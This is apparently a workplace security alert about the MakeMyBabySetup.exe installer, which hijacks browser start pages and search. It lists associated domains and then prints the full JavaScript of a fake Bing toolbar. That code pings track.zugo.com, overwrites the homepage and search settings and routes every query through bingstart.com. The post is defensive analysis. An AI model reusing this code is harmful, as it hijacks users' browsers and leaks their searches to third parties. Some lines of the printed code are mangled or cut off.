MakeMyBabySetup.exe [SECURITY ALERT]
Today I came into work and found that a couple of the browsers on a work station had been modified. After searching through the history I found that the file MakeMyBabySetup.exe had been downloaded and executed.
This file is an installer script that will modify your browsers start page and change the default search to Bing. After analyzing files within MakeMyBabySetup.exe it appears that searches go to the non Bing site BingStart.com and then redirects to the actual Bing.com site. It also installs a fake Bing toolbar within Firefox. This is providing your search criteria and current URL to a third party. It will also allow the third party to redirect you to any site they like.
Recommendation:
Delete MakeMyBabySetup.exe
Uninstall the toolbar and remove Bing as search provider if it has already installed.
Avoid the following sites (They share the same IP as BingStart.com):
www.vlcsearch.com
chameleonsearch.net
www.searchz.org
whitesmokestart.com
free-search.net
www27.yoog.com
forexstart.net
deverevenues.zugo.com
flvdirect.iamwired.net
Other details:
window.addEventListener(“load”, init, false);
function log(str) {
Application.console.log(str);
Application.console.open();
}
function init() {
// Track if toolbar visible
var tlb = document.getElementById(“searchtoolbar-toolbar”);
if (!tlb.collapsed) track();
// Appy default settings
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
if (app.prefs.getValue(“extensions.searchtoolbar.installed”, “0″)!=”1″) applySettings();
setUserAgent();
// Handle uninstall
var ext = Application.extensions.get(“searchtoolbar@zugo.com”);
var listener = {
uninstall: false,
ext: ext,
handleEvent: function(aEventItem) {
switch (aEventItem.type) {
case ‘uninstall’:
restoreSettings();
return;
case ‘unload’:
ext.events.removeListener(‘uninstall’, this);
Application.events.removeListener(‘unload’, this);
return;
}
}
};
ext.events.addListener(‘uninstall’, listener);
ext.events.addListener(‘cancel’, listener);
Application.events.addListener(‘unload’, listener);
}
function track() {
var req = Components.classes["@mozilla.org/xmlextras/xmlhttprequest;1"].createInstance(Components.interfaces.nsIXMLHttpRequest);
req.open(‘GET’, ‘http://track.zugo.com/cgi-bin/registerImp.py?type=churn&loc=toolbar’, true);
req.send(null);
}
function applySettings() {
// Remember that toolbar installed
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
app.prefs.setValue(“extensions.searchtoolbar.installed”, “1″);
// Add Bing search
var search = Components.classes["@mozilla.org/browser/search-service;1"].getService(Components.interfaces.nsIBrowserSearchService);
if (search) search.addEngine(“chrome://searchtoolbar/content/bing-zugo.xml”, 1, “”, false);
// Set homepage
if (app.prefs.getValue(“extensions.searchtoolbar.startpage”, false)) {
app.prefs.setValue(“extensions.searchtoolbar.oldhomepage”, app.prefs.getValue(“browser.startup.homepage”, “”));
app.prefs.setValue(“browser.startup.homepage”, “http://www.bingstart.com/”);
}
// Set search
if (app.prefs.getValue(“extensions.searchtoolbar.defaultsearch”, false)) {
app.prefs.setValue(“browser.search.defaultenginename”, “Bing”);
app.prefs.setValue(“keyword.URL”, “http://www.bingstart.com/s/?src=FF-Address&site=$SearchProvider&q=”);
}
// Open install url
if (app.prefs.getValue(“extensions.searchtoolbar.installregister”, false)) {
var win = window.open(“http://www.bingstart.com/”, “”);
win.focus();
}
// Open optional url
var firstrunURL = app.prefs.getValue(“extensions.searchtoolbar.firstrunURL”, “”);
if (firstrunURL!=”") {
var win = window.open(firstrunURL, “”);
win.focus();
}
}
function setUserAgent() {
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
var navid = app.prefs.getValue(“pref.searchtoolbar.navid”, “”);
if (navid!=”") app.prefs.setValue(“general.useragent.extra.searchtoolbar”, navid);
}
function restoreSettings() {
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
app.prefs.setValue(“extensions.searchtoolbar.installed”, “0″);
app.prefs.setValue(“browser.startup.homepage”, app.prefs.getValue(“extensions.searchtoolbar.oldhomepage”, “”));
app.prefs.setValue(“keyword.URL”, “”);
app.prefs.setValue(“browser.search.defaultenginename”, “”);
}
function searchtoolbar_search_setup(event, type) {
var btn = document.getElementById(“bing-combined-button”);
btn.setAttribute(“image”, “chrome://searchtoolbar/skin/drop_”+type+”.png”);
btn.setAttribute(“searchType”, type);
}
function searchtoolbar_search(event, defaultType) {
var btn = document.getElementById(“bing-combined-button”);
var type = btn.getAttribute(“searchType”);
if (!type) type = defaultType;
var searchBox = document.getElementById(“bing-search-box”);
var searchTerms = searchtoolbar_uri(searchtoolbar_trim(searchBox.value));
searchtoolbar_navigate(“http://www.bingstart.com/s/?q=”+searchTerms+”&engine=”+type+”&site=Bing”);
}
function searchtoolbar_trim(str) {
if (!str) return “”;
str = str.replace(/^\s+/, ”);
str = str.replace(/\s+$/, ”);
str = str.replace(/\s+/g, ‘ ‘);
return str;
}
function searchtoolbar_uri(str) {
var result = “”;
var termArray = new Array();
termArray = str.split(” “);
for(var i=0; i
result += encodeURIComponent(termArray[i]);
}
return result;
}
function searchtoolbar_navigate(url) {
window._content.document.location = processUrl(url);
window.content.focus();
}
function processUrl(url) {
url += (url.indexOf(“?”)==-1 && url[url.length-1]==”/”) ? “?” : “&”;
url += “src=FF-Toolbar”;
var app = Components.classes["@mozilla.org/fuel/application;1"].getService(Components.interfaces.fuelIApplication);
var cfg = app.prefs.getValue(“extensions.searchtoolbar.cfg”, “”);
if (cfg!=”") url += “&cfg=”+cfg;
var subdomain = app.prefs.getValue(“extensions.searchtoolbar.subdomain”, “”);
if (subdomain!=”") url = url.replace(“http://www.”, “http://”+subdomain+”.”);
return url;
}
function searchtoolbar_key(event) {
if(event.keyCode == event.DOM_VK_RETURN) searchtoolbar_search(event, ‘web’);
}
function searchtoolbar_suggest() {
var searchBox = document.getElementById(“bing-search-box”);
var searchTerms = searchtoolbar_uri(searchtoolbar_trim(searchBox.value));
}
